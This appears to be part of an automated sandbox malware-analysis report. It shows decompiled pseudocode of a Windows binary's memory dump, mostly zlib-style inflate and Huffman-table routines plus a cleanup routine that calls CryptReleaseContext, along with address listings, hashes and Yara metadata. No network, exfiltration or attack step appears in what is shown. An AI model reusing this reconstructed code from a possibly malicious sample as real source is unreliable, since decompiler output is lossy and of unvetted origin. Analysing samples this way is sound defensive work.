						while( *(_t490 + 0xc) < 3) {
							if( *(_t490 - 4) == 0) {
								goto L107;
							}
							_t479 =  *(_t490 + 0xc);
							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
							 *(_t490 - 4) =  *(_t490 - 4) - 1;
							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
							_t476 =  &(_t476[1]);
							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
						}
						_t436 =  *(_t490 + 8) & 0x00000007;
						_t479 = _t436 & 0x00000001;
						_t438 = _t436 >> 1;
						__eflags = _t438;
						_t488[6] = _t436 & 0x00000001;
						if(_t438 == 0) {
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 1;
							_t479 =  *(_t490 + 0xc) & 0x00000007;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
							goto L98;
						}
						_t442 = _t438 - 1;
						__eflags = _t442;
						if(_t442 == 0) {
							_push(_t485);
							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
							_t493 = _t493 + 0x28;
							_t488[1] = _t448;
							__eflags = _t448;
							if(_t448 == 0) {
								goto L116;
							}
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 6;
							goto L98;
						}
						_t455 = _t442 - 1;
						__eflags = _t455;
						if(_t455 == 0) {
							 *(_t490 + 8) =  *(_t490 + 8) >> 3;
							_t456 = 3;
							_t33 = _t490 + 0xc;
							 *_t33 =  *(_t490 + 0xc) - _t456;
							__eflags =  *_t33;
							goto L16;
						}
						__eflags = _t455 == 1;
						if(_t455 == 1) {
							 *_t488 = 9;
							 *(_t485 + 0x18) = "invalid block type";
							_t488[8] =  *(_t490 + 8) >> 3;
							_t461 =  *(_t490 + 0xc) + 0xfffffffd;
							L105:
							_t488[7] = _t461;
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							_push(0xfffffffd);
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						goto L98;
					}
					L104:
					__eax =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					goto L105;
					L122:
					__eax =  *(__ebp + 8);
					_push(1);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__eax =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__eax =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					__edi[2] = __edi[2] + __ebx -  *__edi;
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					goto L100;
					L118:
					__eax =  *(__ebp - 8);
					 *(__esi + 0x34) =  *(__ebp - 8);
					__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
					__ecx =  *(__esi + 0x34);
					__eflags =  *(__esi + 0x30) - __ecx;
					 *(__ebp - 8) = __ecx;
					if( *(__esi + 0x30) == __ecx) {
						 *__esi = 8;
						goto L122;
					}
					__ecx =  *(__ebp + 8);
					 *(__esi + 0x20) =  *(__ebp + 8);
					__ecx =  *(__ebp + 0xc);
					 *(__esi + 0x1c) =  *(__ebp + 0xc);
					__ecx =  *(__ebp - 4);
					__edi[1] =  *(__ebp - 4);
					__ebx = __ebx -  *__edi;
					 *__edi = __ebx;
					_t409 =  &(__edi[2]);
					 *_t409 = __edi[2] + __ebx -  *__edi;
					__eflags =  *_t409;
					__ecx =  *(__ebp - 8);
					 *(__esi + 0x34) = __ecx;
					goto L120;
				}
			}























                0x004043b7
                0x004043b9
                0x004043be
                0x004043c2
                0x004043c5
                0x004043cb
                0x004043cd
                0x004043d3
                0x004043d9
                0x004043dc
                0x004043e1
                0x004043e4
                0x004043f0
                0x004043f0
                0x004043e6
                0x004043e9
                0x004043e9
                0x004043f2
                0x004043f4
                0x004043fa
                0x004049c2
                0x004049c5
                0x004049c7
                0x004049cd
                0x004049d3
                0x004049da
                0x004049dc
                0x004049dc
                0x004049dc
                0x004049e2
                0x00000000
                0x00404400
                0x00404408
                0x00404408
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00404935
                0x00404935
                0x0040493b
                0x0040493e
                0x00404941
                0x00404944
                0x00404947
                0x0040494c
                0x0040494f
                0x00404952
                0x00404955
                0x00404958
                0x0040495b
                0x00404963
                0x00404966
                0x00404b89
                0x00404b89
                0x004049e5
                0x004049e5
                0x004049e6
                0x004049e7
                0x004049ef
                0x004049f3
                0x004049f3
                0x0040496c
                0x00404979
                0x0040497c
                0x0040497e
                0x00404981
                0x00404984
                0x00404985
                0x00404988
                0x0040498b
                0x0040498c
                0x0040498f
                0x00404992
                0x00404995
                0x00404998
                0x0040499a
                0x004049a1
                0x004049a4
                0x004049a4
                0x0040499c
                0x0040499c
                0x0040499e
                0x0040499e
                0x004049a7
                0x004049ab
                0x004049ae
                0x00404b44
                0x00000000
                0x004049b4
                0x004049b4
                0x004049b4
                0x004049b7
                0x004049b7
                0x004049b9
                0x004049bc
                0x00404402
                0x00000000
                0x00404405
                0x00000000
                0x004049bc
                0x0040476e
                0x0040476e
                0x0040476e
                0x00404771
                0x00404774
                0x00404776
                0x00404779
                0x0040477c
                0x0040477f
                0x0040477f
                0x00404786
                0x00404788
                0x00000000
                0x00000000
                0x0040478e
                0x00404791
                0x00404791
                0x00404794
                0x00000000
                0x00000000
                0x00404796
                0x0040479a
                0x00404a58
                0x00404a5b
                0x00404a61
                0x00404a64
                0x00404a64
                0x00404a64
                0x00404a68
                0x00404a6a
                0x00404a6f
                0x00404a71
                0x00404a77
                0x00000000
                0x00404a77
                0x004047a0
                0x004047a3
                0x004047a6
                0x004047aa
                0x004047ad
                0x004047af
                0x004047b2
                0x004047b3
                0x004047b3
                0x004047b9
                0x004047c0
                0x004047c3
                0x004047c6
                0x004047ca
                0x004047cd
                0x004047d0
                0x004047d3
                0x004047d7
                0x004047da
                0x004047f5
                0x004047f8
                0x004047ff
                0x004047ff
                0x004047fa
                0x004047fc
                0x004047fc
                0x00404802
                0x00404804
                0x0040480a
                0x0040480b
                0x0040480e
                0x0040480e
                0x00404811
                0x00404814
                0x00404814
                0x00404817
                0x0040481a
                0x0040481d
                0x00000000
                0x00000000
                0x0040481f
                0x00404823
                0x00000000
                0x00000000
                0x00404829
                0x0040482c
                0x0040482f
                0x00404833
                0x00404836
                0x00404838
                0x0040483b
                0x0040483c
                0x0040483c
                0x00404842
                0x0040484c
                0x0040484f
                0x00404852
                0x00404854
                0x00404857
                0x0040485a
                0x0040485c
                0x0040485f
                0x00404862
                0x00404865
                0x00404867
                0x0040486a
                0x0040486d
                0x00404870
                0x00404870
                0x0040487a
                0x0040487c
                0x0040487e
                0x00404a94
                0x00404a9d
                0x00404aa0
                0x00404aa6
                0x00404aad
                0x00404ab0
                0x00404ab5
                0x00404ab8
                0x00404abb
                0x00404ac0
                0x00404ac3
                0x00404ac6
                0x00404ac9
                0x00404acc
                0x00404acf
                0x00000000
                0x00404ad4
                0x00404884
                0x00404888
                0x0040489c
                0x0040489c
                0x0040489e
                0x0040489e
                0x0040489e
                0x004048a1
                0x004048a4
                0x004048a5
                0x004048a5
                0x004048a5
                0x004048a5
                0x004048aa
                0x00000000
                0x004048aa
                0x0040488a
                0x0040488d
                0x00000000
                0x00000000
                0x00404893
                0x00404896
                0x00000000
                0x00404896
                0x004047dc
                0x004047df
                0x004047e1
                0x004047e4
                0x004047e7
                0x004047ea
                0x004047ed
                0x004047ed
                0x004048b3
                0x004048b9
                0x004048bc
                0x004048c0
                0x004048cc
                0x004048d0
                0x004048d4
                0x004048d9
                0x004048dc
                0x004048df
                0x004048e2
                0x004048e7
                0x004048e8
                0x004048f1
                0x004048f9
                0x004048fc
                0x004048fe
                0x00404adc
                0x00404ae0
                0x00404ae0
                0x00404ae8
                0x00404aeb
                0x00404aec
                0x00404af2
                0x00404af2
                0x00404af3
                0x00404af6
                0x00404af9
                0x00404afc
                0x00404aff
                0x00404b02
                0x00404b05
                0x00404b0a
                0x00404b0c
                0x00404b0e
                0x00404b11
                0x00404b14
                0x00000000
                0x00404b14
                0x00404911
                0x00404919
                0x0040491b
                0x00404b1c
                0x00404b1f
                0x00404b21
                0x00404b27
                0x00404b2d
                0x00404b34
                0x00404b36
                0x00404b3c
                0x00000000
                0x00404b3c
                0x00404924
                0x0040492a
                0x0040492d
                0x0040492e
                0x00404934
                0x00000000
                0x004046b8
                0x004046bb
                0x004046be
                0x004046c1
                0x004046c4
                0x00404721
                0x00404721
                0x00404721
                0x00404725
                0x00000000
                0x00000000
                0x00404727
                0x0040472a
                0x00404734
                0x00404738
                0x00404738
                0x0040473e
                0x00404744
                0x0040474c
                0x00404752
                0x0040475a
                0x0040475d
                0x0040475f
                0x00404a8e
                0x00000000
                0x00404a8e
                0x00404765
                0x00404765
                0x00404765
                0x00404768
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004046c6
                0x004046c6
                0x004046c6
                0x004046c9
                0x004046c9
                0x004046cc
                0x00000000
                0x00000000
                0x004046ce
                0x004046d2
                0x00000000
                0x00000000
                0x004046d8
                0x004046db
                0x004046df
                0x004046e2
                0x004046e4
                0x004046e7
                0x004046e8
                0x004046eb
                0x004046eb
                0x004046f0
                0x004046f0
                0x004046f3
                0x004046f6
                0x004046f9
                0x004046fc
                0x00404703
                0x00404707
                0x0040470b
                0x0040470e
                0x00404711
                0x00404714
                0x0040471a
                0x0040471d
                0x0040471d
                0x00000000
                0x0040462b
                0x0040462b
                0x0040462e
                0x0040462e
                0x00404631
                0x00000000
                0x00000000
                0x00404633
                0x00404637
                0x00000000
                0x00000000
                0x0040463d
                0x00404640
                0x00404644
                0x00404647
                0x00404649
                0x0040464c
                0x0040464d
                0x00404650
                0x00404650
                0x00404655
                0x00404658
                0x0040465d
                0x0040465f
                0x00404662
                0x00404665
                0x00404668
                0x00404a7f
                0x00404a7f
                0x00404a85
                0x00000000
                0x00404a85
                0x00404670
                0x00404676
                0x0040467c
                0x00000000
                0x00000000
                0x00404682
                0x00404685
                0x00404695
                0x00404698
                0x0040469b
                0x0040469e
                0x004046a0
                0x00000000
                0x00000000
                0x004046a6
                0x004046aa
                0x004046ae
                0x004046ae
                0x004046ae
                0x004046b2
                0x00000000
                0x0040453a
                0x0040453a
                0x0040453e
                0x00000000
                0x00000000
                0x00404544
                0x00404546
                0x004045d7
                0x004045d7
                0x004045da
                0x004045dd
                0x004045e1
                0x004045e3
                0x004045e6
                0x004045e8
                0x004045e8
                0x004045eb
                0x004045ee
                0x004045f1
                0x004045f3
                0x004045f3
                0x004045fd
                0x00404602
                0x00404605
                0x00404608
                0x0040460b
                0x0040460e
                0x00404611
                0x00404613
                0x00404613
                0x00404613
                0x00404616
                0x0040461c
                0x0040461f
                0x00404621
                0x00404623
                0x00404469
                0x00404469
                0x00404469
                0x00000000
                0x00404616
                0x0040454c
                0x0040454f
                0x00404551
                0x00404575
                0x00404578
                0x0040457b
                0x00404580
                0x00404585
                0x00404588
                0x0040458b
                0x00404591
                0x00404593
                0x00404596
                0x004045a3
                0x004045a6
                0x004045a6
                0x004045a9
                0x00404598
                0x0040459a
                0x0040459d
                0x0040459e
                0x0040459e
                0x004045ac
                0x004045af
                0x004045b2
                0x004045b4
                0x004045b7
                0x004045b9
                0x004045bb
                0x004045be
                0x004045c8
                0x004045c8
                0x004045ca
                0x004045c0
                0x004045c0
                0x004045c2
                0x004045c3
                0x004045c3
                0x004045be
                0x004045b9
                0x004045cd
                0x004045d1
                0x00404a44
                0x00404a47
                0x00404a4a
                0x00404a4d
                0x00404a50
                0x00404a53
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004045d1
                0x00404553
                0x00404556
                0x00404559
                0x0040455b
                0x00000000
                0x00000000
                0x0040455d
                0x00404560
                0x0040456a
                0x0040456a
                0x0040456c
                0x00404562
                0x00404562
                0x00404565
                0x00404565
                0x0040456f
                0x00404573
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004044dc
                0x004044dc
                0x004044df
                0x004044df
                0x004044e2
                0x00000000
                0x00000000
                0x004044e4
                0x004044e8
                0x00000000
                0x00000000
                0x004044ee
                0x004044f1
                0x004044f5
                0x004044f8
                0x004044fa
                0x004044fd
                0x004044fe
                0x00404501
                0x00404501
                0x00404506
                0x00404509
                0x0040450c
                0x0040450e
                0x00404513
                0x00404516
                0x00404516
                0x00404518
                0x00404a12
                0x00404a18
                0x00000000
                0x00404a18
                0x0040451e
                0x00404521
                0x00404523
                0x00404526
                0x00404529
                0x0040452c
                0x00000000
                0x00000000
                0x00404534
                0x00000000
                0x00000000
                0x0040440f
                0x00404419
                0x00000000
                0x00000000
                0x00404422
                0x00404425
                0x00404429
                0x0040442e
                0x00404431
                0x00404432
                0x00404432
                0x0040443b
                0x00404442
                0x00404445
                0x00404445
                0x00404448
                0x0040444b
                0x004044b9
                0x004044c3
                0x004044c9
                0x004044d1
                0x004044d4
                0x00000000
                0x004044d4
                0x0040444d
                0x0040444d
                0x0040444e
                0x00404473
                0x00404481
                0x00404493
                0x00404498
                0x0040449b
                0x0040449e
                0x004044a0
                0x00000000
                0x00000000
                0x004044a6
                0x004044aa
                0x004044ae
                0x00000000
                0x004044ae
                0x00404450
                0x00404450
                0x00404451
                0x0040445f
                0x00404465
                0x00404466
                0x00404466
                0x00404466
                0x00000000
                0x00404466
                0x00404453
                0x00404454
                0x004049f7
                0x00404a00
                0x00404a07
                0x00404a0d
                0x00404a28
                0x00404a28
                0x00404a2e
                0x00404a35
                0x00404a37
                0x00404a39
                0x00404a3f
                0x00000000
                0x00404a3f
                0x00000000
                0x0040445a
                0x00404a1f
                0x00404a1f
                0x00404a22
                0x00404a25
                0x00000000
                0x00404b95
                0x00404b95
                0x00404b98
                0x00404b9a
                0x00404b9d
                0x00404ba0
                0x00404ba3
                0x00404ba6
                0x00404bab
                0x00404bad
                0x00404baf
                0x00404bb2
                0x00404bb5
                0x00000000
                0x00404b4a
                0x00404b4d
                0x00404b50
                0x00404b55
                0x00404b5a
                0x00404b60
                0x00404b63
                0x00404b66
                0x00404b8f
                0x00000000
                0x00404b8f
                0x00404b68
                0x00404b6b
                0x00404b6e
                0x00404b71
                0x00404b74
                0x00404b77
                0x00404b7c
                0x00404b7e
                0x00404b80
                0x00404b80
                0x00404b80
                0x00404b83
                0x00404b86
                0x00000000
                0x00404b86

                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                • Instruction ID: 90343a8667ee0670e87e021bba3e221c8adc0c1da1bb1a76252bfdf766af77e9
                • Opcode Fuzzy Hash: f98d37e25a52c04dcc5b825836114b3c9bed0208ddb816caf6c63d538b842863
                • Instruction Fuzzy Hash: FB520CB5900609EFCB14CF69C580AAABBF1FF49315F10852EE95AA7780D338EA55CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004018B9 Relevance: 1.5, APIs: 1, Instructions: 25encryptionCOMMON
                Download Yara Rule
                C-Code - Quality: 16%
                			E004018B9(void* __ecx) {
				signed int _t10;
				signed int _t11;
				long* _t12;
				void* _t13;
				void* _t18;

				_t18 = __ecx;
				_t10 =  *(__ecx + 8);
				if(_t10 != 0) {
					 *0x40f89c(_t10);
					 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				}
				_t11 =  *(_t18 + 0xc);
				if(_t11 != 0) {
					 *0x40f89c(_t11);
					 *(_t18 + 0xc) =  *(_t18 + 0xc) & 0x00000000;
				}
				_t12 =  *(_t18 + 4);
				if(_t12 != 0) {
					CryptReleaseContext(_t12, 0);
					 *(_t18 + 4) =  *(_t18 + 4) & 0x00000000;
				}
				_t13 = 1;
				return _t13;
			}








                0x004018ba
                0x004018bc
                0x004018c1
                0x004018c4
                0x004018ca
                0x004018ca
                0x004018ce
                0x004018d3
                0x004018d6
                0x004018dc
                0x004018dc
                0x004018e0
                0x004018e5
                0x004018ea
                0x004018f0
                0x004018f0
                0x004018f6
                0x004018f8

                APIs
                • CryptReleaseContext.ADVAPI32(?,00000000,?,004013DB,?,?,?,0040139D,?,?,00401366), ref: 004018EA
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: ContextCryptRelease
                • String ID:
                • API String ID: 829835001-0
                • Opcode ID: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                • Instruction ID: 2349b07d823645f04250185dd133334db1216db109592f97c32ed3e6f6040a2b
                • Opcode Fuzzy Hash: 5ecafc68ca33f8cfa3c4e9ed1ded46982a6db61dfcb788b9f393b121ae522fda
                • Instruction Fuzzy Hash: C7E0ED323147019BEB30AB65ED49B5373E8AF00762F04C83DB05AE6990CBB9E8448A58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404C19 Relevance: .3, Instructions: 331COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 98%
                			E00404C19(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28, intOrPtr _a32, signed int* _a36, signed char* _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char* _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				void* _v40;
				char _v43;
				signed char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v180;
				signed int _v184;
				signed int _v244;
				signed int _t190;
				intOrPtr* _t192;
				signed int _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				signed int _t199;
				intOrPtr _t203;
				intOrPtr _t207;
				signed char* _t211;
				signed char _t212;
				signed int _t214;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t220;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t228;
				intOrPtr _t229;
				signed int _t231;
				char _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t241;
				signed int _t242;
				intOrPtr _t243;
				signed int* _t244;
				signed int _t246;
				signed int _t247;
				signed int* _t248;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				signed int _t252;
				signed char _t257;
				signed int _t266;
				signed int _t269;
				signed char _t271;
				intOrPtr _t275;
				signed char* _t277;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr* _t287;
				intOrPtr _t294;
				signed int _t296;
				intOrPtr* _t297;
				intOrPtr _t298;
				intOrPtr _t300;
				signed char _t302;
				void* _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t319;
				intOrPtr _t320;
				unsigned int _t321;
				intOrPtr* _t322;
				void* _t323;

				_t248 = _a4;
				_t296 = _a8;
				_t280 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_t307 = _t296;
				do {
					_t190 =  *_t248;
					_t248 =  &(_t248[1]);
					 *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) =  *((intOrPtr*)(_t323 + _t190 * 4 - 0x74)) + 1;
					_t307 = _t307 - 1;
				} while (_t307 != 0);
				if(_v120 != _t296) {
					_t297 = _a28;
					_t241 = 1;
					_t192 =  &_v116;
					_t308 =  *_t297;
					_t249 = _t241;
					_a28 = _t308;
					while( *_t192 == _t280) {
						_t249 = _t249 + 1;
						_t192 = _t192 + 4;
						if(_t249 <= 0xf) {
							continue;
						}
						break;
					}
					_v8 = _t249;
					if(_t308 < _t249) {
						_a28 = _t249;
					}
					_t309 =  &_v60;
					_t193 = 0xf;
					while( *_t309 == _t280) {
						_t193 = _t193 - 1;
						_t309 = _t309 - 4;
						if(_t193 != _t280) {
							continue;
						}
						break;
					}
					_v28 = _t193;
					if(_a28 > _t193) {
						_a28 = _t193;
					}
					_t242 = _t241 << _t249;
					 *_t297 = _a28;
					if(_t249 >= _t193) {
						L20:
						_t312 = _t193 << 2;
						_t298 =  *((intOrPtr*)(_t323 + _t312 - 0x74));
						_t250 = _t323 + _t312 - 0x74;
						_t243 = _t242 - _t298;
						_v52 = _t243;
						if(_t243 < 0) {
							goto L39;
						}
						_v180 = _t280;
						 *_t250 = _t298 + _t243;
						_t251 = 0;
						_t195 = _t193 - 1;
						if(_t195 == 0) {
							L24:
							_t244 = _a4;
							_t300 = 0;
							do {
								_t196 =  *_t244;
								_t244 =  &(_t244[1]);
								if(_t196 != _t280) {
									_t252 =  *(_t323 + _t196 * 4 - 0xb4);
									 *((intOrPtr*)(_a40 + _t252 * 4)) = _t300;
									 *(_t323 + _t196 * 4 - 0xb4) = _t252 + 1;
									_t280 = 0;
								}
								_t300 = _t300 + 1;
							} while (_t300 < _a8);
							_v12 = _v12 | 0xffffffff;
							_a8 =  *((intOrPtr*)(_t323 + _t312 - 0xb4));
							_v16 = _t280;
							_v20 = _a40;
							_t199 = _v8;
							_t246 =  ~_a28;
							_v184 = _t280;
							_v244 = _t280;
							_v32 = _t280;
							_a4 = _t280;
							if(_t199 > _v28) {
								L64:
								if(_v52 == _t280 || _v28 == 1) {
									L4:
									return 0;
								} else {
									_push(0xfffffffb);
									goto L67;
								}
							}
							_v48 = _t199 - 1;
							_v36 = _t323 + _t199 * 4 - 0x74;
							do {
								_t203 =  *_v36;
								_v24 = _t203 - 1;
								if(_t203 == 0) {
									goto L63;
								} else {
									goto L31;
								}
								do {
									L31:
									_t207 = _a28 + _t246;
									if(_v8 <= _t207) {
										L46:
										_v43 = _v8 - _t246;
										_t257 = _a40 + _a8 * 4;
										_t211 = _v20;
										if(_t211 < _t257) {
											_t212 =  *_t211;
											if(_t212 >= _a12) {
												_t214 = _t212 - _a12 << 2;
												_v44 =  *((intOrPtr*)(_t214 + _a20)) + 0x50;
												_t302 =  *(_t214 + _a16);
											} else {
												_t302 = _t212;
												asm("sbb cl, cl");
												_v44 = (_t257 & 0x000000a0) + 0x60;
											}
											_v20 =  &(_v20[4]);
											L52:
											_t313 = 1;
											_t314 = _t313 << _v8 - _t246;
											_t216 = _v16 >> _t246;
											if(_t216 >= _a4) {
												L56:
												_t217 = 1;
												_t218 = _t217 << _v48;
												_t266 = _v16;
												while((_t266 & _t218) != 0) {
													_t266 = _t266 ^ _t218;
													_t218 = _t218 >> 1;
												}
												_v16 = _t266 ^ _t218;
												_t220 = _t323 + _v12 * 4 - 0xb4;
												while(1) {
													_t315 = 1;
													if(((_t315 << _t246) - 0x00000001 & _v16) ==  *_t220) {
														goto L62;
													}
													_v12 = _v12 - 1;
													_t220 = _t220 - 4;
													_t246 = _t246 - _a28;
												}
												goto L62;
											}
											_t277 = _v32 + _t216 * 8;
											do {
												_t216 = _t216 + _t314;
												 *_t277 = _v44;
												_t277[4] = _t302;
												_t277 = _t277 + (_t314 << 3);
											} while (_t216 < _a4);
											_t280 = 0;
											goto L56;
										}
										_v44 = 0xc0;
										goto L52;
									} else {
										goto L32;
									}
									do {
										L32:
										_t269 = _a28;
										_v12 = _v12 + 1;
										_t246 = _t246 + _t269;
										_v56 = _t207 + _t269;
										_t224 = _v28 - _t246;
										_a4 = _t224;
										if(_t224 > _t269) {
											_a4 = _t269;
										}
										_t271 = _v8 - _t246;
										_t225 = 1;
										_t226 = _t225 << _t271;
										_t282 = _v24 + 1;
										if(_t226 <= _t282) {
											L40:
											_t283 = 1;
											_t228 =  *_a36;
											_t284 = _t283 << _t271;
											_a4 = _t284;
											_t319 = _t228 + _t284;
											if(_t319 > 0x5a0) {
												goto L39;
											}
										} else {
											_t320 = _v36;
											_t236 = _t226 + (_t282 | 0xffffffff) - _v24;
											if(_t271 >= _a4) {
												goto L40;
											} else {
												goto L36;
											}
											while(1) {
												L36:
												_t271 = _t271 + 1;
												if(_t271 >= _a4) {
													goto L40;
												}
												_t294 =  *((intOrPtr*)(_t320 + 4));
												_t320 = _t320 + 4;
												_t237 = _t236 << 1;
												if(_t237 <= _t294) {
													goto L40;
												}
												_t236 = _t237 - _t294;
											}
											goto L40;
										}
										_t229 = _a32 + _t228 * 8;
										_v32 = _t229;
										_t287 = _t323 + _v12 * 4 - 0xf0;
										 *_t287 = _t229;
										 *_a36 = _t319;
										_t231 = _v12;
										if(_t231 == 0) {
											 *_a24 = _v32;
										} else {
											_t321 = _v16;
											 *(_t323 + _t231 * 4 - 0xb4) = _t321;
											_t233 = _a28;
											_v44 = _t271;
											_v43 = _t233;
											_t235 = _t321 >> _t246 - _t233;
											_t275 =  *((intOrPtr*)(_t287 - 4));
											_t302 = (_v32 - _t275 >> 3) - _t235;
											 *(_t275 + _t235 * 8) = _v44;
											 *(_t275 + 4 + _t235 * 8) = _t302;
										}
										_t207 = _v56;
									} while (_v8 > _t207);
									_t280 = 0;
									goto L46;
									L62:
									_v24 = _v24 - 1;
								} while (_v24 != 0);
								L63:
								_v8 = _v8 + 1;
								_v36 = _v36 + 4;
								_v48 = _v48 + 1;
							} while (_v8 <= _v28);
							goto L64;
						}
						_t306 = 0;
						do {
							_t251 = _t251 +  *((intOrPtr*)(_t323 + _t306 - 0x70));
							_t306 = _t306 + 4;
							_t195 = _t195 - 1;
							 *((intOrPtr*)(_t323 + _t306 - 0xb0)) = _t251;
						} while (_t195 != 0);
						goto L24;
					} else {
						_t322 = _t323 + _t249 * 4 - 0x74;
						while(1) {
							_t247 = _t242 -  *_t322;
							if(_t247 < 0) {
								break;
							}
							_t249 = _t249 + 1;
							_t322 = _t322 + 4;
							_t242 = _t247 << 1;
							if(_t249 < _t193) {
								continue;
							}
							goto L20;
						}
						L39:
						_push(0xfffffffd);
						L67:
						_pop(_t194);
						return _t194;
					}
				}
				 *_a24 = 0;
				 *_a28 = 0;
				goto L4;
			}







































































































                0x00404c22
                0x00404c28
                0x00404c2b
                0x00404c2d
                0x00404c30
                0x00404c33
                0x00404c36
                0x00404c39
                0x00404c3c
                0x00404c3f
                0x00404c42
                0x00404c45
                0x00404c48
                0x00404c4b
                0x00404c4e
                0x00404c51
                0x00404c54
                0x00404c57
                0x00404c5a
                0x00404c5d
                0x00404c5f
                0x00404c5f
                0x00404c61
                0x00404c64
                0x00404c6c
                0x00404c6c
                0x00404c72
                0x00404c85
                0x00404c8a
                0x00404c8b
                0x00404c8e
                0x00404c90
                0x00404c92
                0x00404c95
                0x00404c99
                0x00404c9a
                0x00404ca0
                0x00000000
                0x00000000
                0x00000000
                0x00404ca0
                0x00404ca4
                0x00404ca7
                0x00404ca9
                0x00404ca9
                0x00404cae
                0x00404cb1
                0x00404cb2
                0x00404cb6
                0x00404cb7
                0x00404cbc
                0x00000000
                0x00000000
                0x00000000
                0x00404cbc
                0x00404cc1
                0x00404cc4
                0x00404cc6
                0x00404cc6
                0x00404ccc
                0x00404cd0
                0x00404cd2
                0x00404cea
                0x00404cec
                0x00404cef
                0x00404cf3
                0x00404cf7
                0x00404cf9
                0x00404cfc
                0x00000000
                0x00000000
                0x00404d04
                0x00404d0a
                0x00404d0c
                0x00404d0e
                0x00404d0f
                0x00404d24
                0x00404d24
                0x00404d27
                0x00404d29
                0x00404d29
                0x00404d2b
                0x00404d30
                0x00404d32
                0x00404d43
                0x00404d47
                0x00404d49
